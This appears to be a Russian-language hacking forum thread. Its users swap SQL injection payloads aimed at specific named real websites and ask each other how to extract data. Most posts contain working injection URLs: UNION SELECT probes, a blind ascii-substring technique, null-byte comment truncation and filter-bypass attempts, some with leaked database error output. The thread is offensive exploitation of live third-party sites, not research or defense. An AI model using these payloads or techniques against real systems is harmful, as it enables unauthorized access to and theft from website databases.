2 aqqa http://www.spravkaweb.ru/php'/**/and/**/1=2/**/union/**/select/**/1,2,3,(select/**/1/**/from/**/user/**/limit/**/0,1),5,6/**/and/**/'1'='1 Вместо 1 подбирай имя столбца =)
А вот нашел кое что круое Warning: oci_execute(): ORA-01460: unimplemented or unreasonable conversion requested in /srv/www/apache2/htdocs/cms_adm/lib/44/oracle.class.php on line 95 array ( 0 => 'http://www.spravkaweb.ru/php\'/**/and/**/1=2/**/union/**/select/**/1,2,3,(select/**/1/**/from/**/user/**/limit/**/0,1),5,6/**/and/**/\'1\'=\'1', 1 => '', ) аракловская база линуксовый сервак,
Добрый день всем ! Возникли трудности с сайтом! SQL-inj есть а вот вывод настроить не получается... Доступ к mysql.user и information_schema.columns закрыты =( http://www.delocrat.ru/index.php?productID=1324+union+select+1,2,3,4-- Как можно обойти это? Заранее спасибо!
Snap, там 4 ветка - информатион_счема вообще нету Юзай мор1ров, подбирай имя таблицы http://www.delocrat.ru/index.php?productID=1324+and+1=if(ascii(substring((select+1+from+[имя_табл]+limit+0,1),1,1))>1,1,(select+1+union+select+2)) Либо попробуй найти вывод в других местах
http://www.delocrat.ru/index.php?productID=1324+union+select+1,2,3,4+from+information_schema.columns--
Snap, напиши так http://www.delocrat.ru/index.php?productID=1324+union+select+1,2,3,4+from+skjdhfjkshk234k34h.columns-- Будет Из этого по твоему следует, что существует база skjdhfjkshk234k34h к которой у нас нету доступа ?)
Натолкнулся на mysql инъекцию в многострочном запросе, Дак вот комментарий типа /* не прокатывает, а -- закомментирует только одну строку, ктонибудь знает выход из ситуации?
prescott, попробуй обрезать нуль-байтом. К примеру: http://www.mosoblmedia.ru/cgi-bin/show.pl?gid=-1+union+select+1,2,3,4,5,6,7%00 http://www.mosoblmedia.ru/cgi-bin/show.pl?gid=-1+union+select+1,2,3,4,5,6,7
маниа.ком ? Если да, то я раскручивал ту скулю как слепую. При истинности выражения (and 1=1) цвет фона будет зеленый, а при ложности (and 1=2) - синий. Ну и дальше по шаблону .. ветка там 5
Это сути дела не меняет(перевод строки то останется в старом запросе), будет: Попробуй продолжить запрос, например: правда в 5-как с альясами при union выдаст тебе что cats.id - нема такой таблички(Unknown column 'id' in 'order clause'):
Здравствуйте, прошу помочь обойти фильтры в скуле: http://www.terra.mu/list.php?c=download&s=title&o=&p=&w=asc%2527
Мало того, что там инъекция после order by ПОЛЕ, еще и фильрация (кривая, но пашущая). Хз, получиться ли что-то из этого.